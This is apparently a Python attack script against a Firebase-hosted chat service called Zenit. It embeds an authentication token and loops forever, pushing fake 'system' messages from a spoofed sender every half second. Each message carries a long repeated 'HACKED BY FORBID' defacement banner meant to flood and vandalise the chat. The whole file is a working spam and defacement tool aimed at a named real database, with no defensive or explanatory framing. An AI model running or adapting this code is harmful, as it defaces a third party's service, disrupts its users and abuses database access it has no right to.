import json
import urllib.request
import urllib.error
import time
import asyncio

FIREBASE_URL = "https://zenit-chat-8df28-default-rtdb.firebaseio.com/chat.json"
AUTH_TOKEN = (
    "eyJhbGciOiJSUzI1NiIsImtpZCI6IjJmMjk1MGEyNGFlYWRkMjYzYzIxM2I2MDNhZjMxN"
    "WEzMjdiNmM3MjAiLCJ0eXAiOiJKV1QifQ.eyJwcm92aWRlcl9pZCI6ImFub255bW91cy"
    "IsImlzcyI6Imh0dHBzOi8vc2VjdXJldG9rZW4uZ29vZ2xlLmNvbS9hcmVzLWNoYXQtZj"
    "c3OTQiLCJhdWQiOiJhcmVzLWNoYXQtZjc3OTQiLCJhdXRoX3RpbWUiOjE3ODIwNjYzOT"
    "ksInVzZXJfaWQiOiJ6NUpUYkNTUmZLZVhjaUF3NXR5dm9mR05FOTQyIiwic3ViIjoiej"
    "VKVGJDU1JmS2VYY2lBdzV0eXZvZkdORTk0MiIsImlhdCI6MTc4MjA2NjM5OSwiZXhwIj"
    "oxNzgyMDY5OTk5LCJmaXJlYmFzZSI6eyJpZGVudGl0aWVzIjp7fSwic2lnbl9pbl9wcm"
    "92aWRlciI6ImFub255bW91cyJ9fQ.TJEyP1YWiUh6C9H80UKQWpOViO7LRTxdtNzyHiv"
    "c0qEocL1MLqTOBZJuuFTlfQwJfddwzEoBJq0ydEP6pqfrWAY47-sxqwsq_2n9pgq0pwF"
    "CiCPl84PXYUc-No90Zw_g0MS1rGnNrgpOWaKyx2aWv35jVQN-jcoa2L7Sqsk5Al_SaBO"
    "gqwllpnYjr_UebO6ET8vXv3huKXeaTwTKZpGwQcYil9A-YFCQSfjSjhIf8XaQfzByxS2"
    "KAB-tmlAYpgXTOc_-qatdhwN7W6T54puEBgkB1YM1IYKe-ryGtCpfPMEyrOIeaHppD0x"
    "Z7GE6U-uoA7DYFxeBQ8Nnd7OtdT8ZLg"
)

def push_to_firebase(data_bytes):
    url = f"{FIREBASE_URL}?auth={AUTH_TOKEN}"
    req = urllib.request.Request(
        url, 
        data=data_bytes, 
        headers={'Content-Type': 'application/json'}, 
        method='PATCH' 
    )
    
    try:
        with urllib.request.urlopen(req) as response:
            return response.read().decode('utf-8')
    except Exception as e:
        return f"Error: {e}"

async def loop_messages_forever(delay_seconds=1.5):
    print("Starting infinite broadcast loop...")
    print("⚠️ PRESS [CTRL + C] IN THIS TERMINAL TO STOP ⚠️\n")
    
    count = 1
    while True:
        # Generate fresh timestamp key for every single message
        timestamp_ms = int(time.time() * 1000)
        custom_key = f"00{timestamp_ms}"
        
        payload = {
            custom_key: {
                "Content": f"⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥 #{count} ⚡",
                "IsAutoClean": False,
                "IsSystem": True,
                "Sender": "FORB1D🔥",
                "SenderUid": 9685313117,
                "Server": "⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥"
            }
        }
        
        data_bytes = json.dumps(payload).encode('utf-8')
        
        # Fire it asynchronously
        print(f"[{count}] Pushing message to database...")
        asyncio.create_task(asyncio.to_thread(push_to_firebase, data_bytes))
        
        # Sleep to prevent rate-limiting and UI crashing
        await asyncio.sleep(delay_seconds)
        count += 1

if __name__ == "__main__":
    try:
        # Set the delay to whatever you want (1.0 or 1.5 is safe)
        asyncio.run(loop_messages_forever(delay_seconds=0.5))
    except KeyboardInterrupt:
        print("\n\n🛑 Process killed manually. Loop stopped.")
